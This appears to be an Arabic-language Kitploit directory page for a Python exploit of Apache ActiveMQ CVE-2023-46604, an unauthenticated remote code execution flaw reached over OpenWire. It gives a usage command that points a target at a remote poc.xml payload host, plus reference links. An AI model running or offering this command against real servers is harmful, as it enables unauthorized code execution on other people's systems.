Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46604-Apache-ActiveMQ-RCE-exp — استغلال تنفيذ التعليمات البرمجية عن بُعد مبني على Python لـ Apache ActiveMQ CVE-2023-46604، يستخدم بروتوكول OpenWire لتسليم حمولات XML لـ RCE غير مصادق عليه. | Kitploit
أدوات/GitHubGitHub/justdoit-cai/cve-2023-46604-apache-activemq-rce-exp
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأداة الوصول عن بعد
GitHubjustdoit-cai/cve-2023-46604-apache-activemq-rce-exp

CVE-2023-46604-Apache-ActiveMQ-RCE-exp

استغلال تنفيذ التعليمات البرمجية عن بُعد مبني على Python لـ Apache ActiveMQ CVE-2023-46604، يستخدم بروتوكول OpenWire لتسليم حمولات XML لـ RCE غير مصادق عليه.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
51منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

مرجع المشروع

هذا المشروع هو إعادة كتابة exp من مشروع https://github.com/X1r0z/ActiveMQ-RCE إلى إصدار python من exp.

الاستخدام

root@kitploit:~
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616

حيث أن المعامل -p الافتراضي هو المنفذ الافتراضي لـ activeMQ. المعامل -x يجب إضافة بادئة البروتوكول.

مقدمة

هنا نرفق رسمًا توضيحيًا لبروتوكول openwire ليكون واضحًا. فيما يلي تنسيق حزمة البيانات من نوع .

Throwable

انظر المقالات المرجعية أدناه لتحليل الثغرة المحدد.

المقالات المرجعية

root@kitploit:~
# تحليل بروتوكول openwire
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# تحليل مبدأ ثغرة CVE
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
تنزيل الأداة